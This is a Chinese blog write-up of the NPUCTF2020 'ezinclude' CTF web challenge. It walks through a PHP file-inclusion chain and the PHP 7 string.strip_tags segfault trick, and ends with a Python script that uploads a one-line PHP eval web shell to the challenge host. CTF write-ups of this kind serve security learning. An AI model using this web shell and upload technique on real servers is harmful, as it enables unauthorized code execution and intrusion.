[NPUCTF2020]ezinclude 1

已于 2023-07-14 09:23:53 修改
阅读量321 收藏 1
点赞数
分类专栏: CTF-WEB 文章标签: php 开发语言
于 2023-02-09 15:53:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46196627/article/details/128954329
版权

解题思路:

从题标题中获取 include考察点

  • 善于常看源代码,注释 $name pass等

  • 通过bp抓包查看数据传输内容,发现cookie hash值 ,构造?name=1 /2抓放包发现hash值的变化

  • 构造payload 满足md5===pass 将cookie中hash传入?name=1&pass=cookie值 抓包发现 flflflag.php文件

  • 得到$_get[‘file’] include 使用php://filter 对代码读取

  • 找关键代码 若没发现 dirsearch.py 目录扫描 dir.php

  • scandir(‘/temp’)

  • 此时php版本在这里插入图片描述

  • 利用 php7 segment fault 特性

  • 大致意思是:使用伪协议php://filter中的string.strip_stags 过滤器 并上传文件 php的垃圾回收机制就不会继续执行 使post传递的文件存储在/temp/文件下
    10.利用条件

  • php7.0.0-7.1.2可以利用

  • php7.1.3-7.2.1可以利用

  • php7.2.2-7.2.8可以利用

  • 可以获取文件名

  • 源代码get参数进行文件包含

import requests
from io import BytesIO

payload = '<?php @eval($_POST[cmd]);?>'
data = {'file':BytesIO(payload.encode())}
url = "http://76c105e9-2474-4265-acf2-d7f6ab6ee6c8.node4.buuoj.cn:81//flflflflag.php?file=php://filter/string.strip_tags/resource=/etc/passwd"
re = requests.post(url=url,files=data,allow_redirects=False);
龙咯李
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]ezinclude
qq_40327508的博客
12-09 1639
进入页面发现需要传入name和pass,源代码发现hint 疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值 得到了 flflflflag.php ,访问重定向到了其他页面,抓包抓回来,页面提示 include($_GET[“file”]) ,扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件 这里考察的是PHP临时文件包含,其基本是两种情况: 利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除 PHP版本<7.2,利用ph
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
解读“模块的沟通”
08-04
我在写Verilog的时候,经常会用到一种方法(这一种方法是akuei2发明的)为了大家能看懂我的程序。
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
--------已搬运--------[NPUCTF2020]ezinclude - 文件包含 --- php7 漏洞 --。string.strip_tags SegmentFault
Zero_Adam的博客
03-27 676
目录:一、自己做:二、不足:三、 学习WP:新知识!!!string.strip_tags 一、自己做: 0入门,,连接:https://buuoj.cn/challenges#[NPUCTF2020]ezinclude 二、不足: 看到刚开始的提示就蒙了,没有想到传参这么简单 看到了include,文件包含的漏洞,第一时间没有想到用php的伪协议去读取文件,,,除了filter等等,zip也可以上传木马的呀,这个别忘了,,, 三、 学习WP: 看到这个, 像md5拓展攻击,然后抓包看一下, 一看,
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
最新发布
07-16
m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值